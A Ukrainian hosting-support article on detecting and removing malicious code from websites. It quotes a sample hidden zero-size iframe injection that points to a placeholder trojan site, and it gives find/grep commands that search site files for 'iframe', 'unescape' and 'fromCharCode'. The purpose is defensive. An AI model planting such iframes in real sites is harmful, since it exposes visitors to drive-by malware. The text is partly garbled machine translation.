Вірус на сайті - як його знайти і видалити
Останнім часом почастішали випадки зараження файлів сайтів шкідливими кодами (вірусами). Наявність вірусів на сайті дуже небезпечно не тільки для відвідувачів, але може стати причиною блокування сайту в пошукових системах.
Власна безпека перш за все!
Насамперед перевірте свій комп'ютер на наявність вірусів за допомогою антивірусних програм. Паролі доступу на сайт по FTP зазвичай крадуть віруси-трояни, які заразили ваш комп'ютер або комп'ютер іншої людини, яка знає FTP-доступ до сайту. Після того, як комп'ютер був перевірений і очищений від вірусів, необхідно змінити паролі до FTP.
Наступним, і дуже важливим, етапом є лікування безпосередньо сайту від шкідливого коду (вірусів). Перш, ніж шукати віруси на сайті, необхідно знати, як вони виглядають і де саме їх слід шукати.
Існують лише кілька найпоширеніших кодів вірусів, які використовуються для розміщення на сторінках сайтів. Всі вони використовують одну і ту ж уразливість переповнення буфера браузерів. Уразливість полягає в тому, що за допомогою спеціального коду (iframe) можна непомітно завантажити і запустити на комп'ютері жертви будь-який файл. Перше, на що слід звернути увагу - це підозрілий HTML код з підключенням типу <iframe>.
Приклад коду вставки вірусу:
<Iframe src = "http: // адреса сайту-з-трояном /" width = "0" height = "0" style = "hidden" frameborder = "0" marginheight = "0" marginwidth = "0" scrolling = "no"> </ iframe>
Код вдає із себе приховане вікно нульовий ширини і висоти, яку неможливо виявити при візуальному перегляді сторінки сайту в браузері, однак його наявність у вихідному коді сторінки не обіцяє нічого хорошого.
Ще один типовий приклад наявності вірусу - додавання в текст файлів сайту функції eval.
Як правило, зараження піддаються файли PHP-скриптів (в назві таких файлів використовується розширення .php) і звичайні HTML-сторінки (розширення .html або .htm). Слід звертати увагу на дату модифікації файлів. Подивіться, які з файлів були змінені зовсім недавно. Якщо файлів на сайті трохи, то їх все можна переглянути вручну і візуально знайти підозрілі коди HTML або JavaScript, які потрібно буде видалити. Але іноді такий підхід не допомагає, тому що деякі віруси маскують свою присутність і залишають дату файлу недоторканою.
використовуємо SSH
Дуже зручний і швидкий спосіб роботи з файлами, розміщеними на веб-сервері, надає протокол SSH (Secure Shell - «безпечна оболонка») - мережевий протокол прикладного рівня, що дозволяє виробляти віддалене управління операційною системою і тунелювання TCP-з'єднань (наприклад, для передачі файлів ).
Наведемо приклад, який може значно полегшити пошук заражених файлів на сервері. Підозрілі файли можна виявити командами такого вигляду:
find $ PWD -name '*. *' -exec grep -li "iframe" {} \; find $ PWD -name '*. *' -exec grep -li "unescape" {} \; find $ PWD -name '*. *' -exec grep -li "fromCharCode" {} \;
Виконувати їх слід, підключившись до сайту по SSH і перейшовши в кореневу директорію сайту. Результатом виконання команд буде потрібний нам список файлів, які містять шукані підозрілі ділянки коду. Вам лише потрібно перевірити файли за списком і, в разі необхідності, виправити їх.
Резервна копія вам в помощь!
Якщо шкідливий код на сайт було додано кілька днів тому, то вирішити проблему з його очищенням можна шляхом відновлення файлів сайту з резервної копії. Для цього необхідно самостійно ініціювати відновлення сайту і БД з резервної копії в панелі управління хостингом або звернутися в службу техпідтримки.
Щоб захистити свій комп'ютер і убезпечити сайт проти такого роду зломів, досить мати вихід в інтернет і трохи коштів на покупку ліцензії антивірусної програми.
Оновлення - теж захист
Звертаємо вашу увагу на те, що часто шкідливий код додають, використовуючи вразливості в скриптах вашого сайту. В даному випадку, вирішити таку проблему можна шляхом оновлення їх до останньої стабільної версії, якщо їх розробники стежать за своєю системою і вчасно закривають виявлені «дірки».
Переконавшись, що шкідливий код і зміст повністю видалені з сайту, ви можете виконати антивірусну перевірку, використовуючи або звернутися в нашу службу техпідтримки сайтів .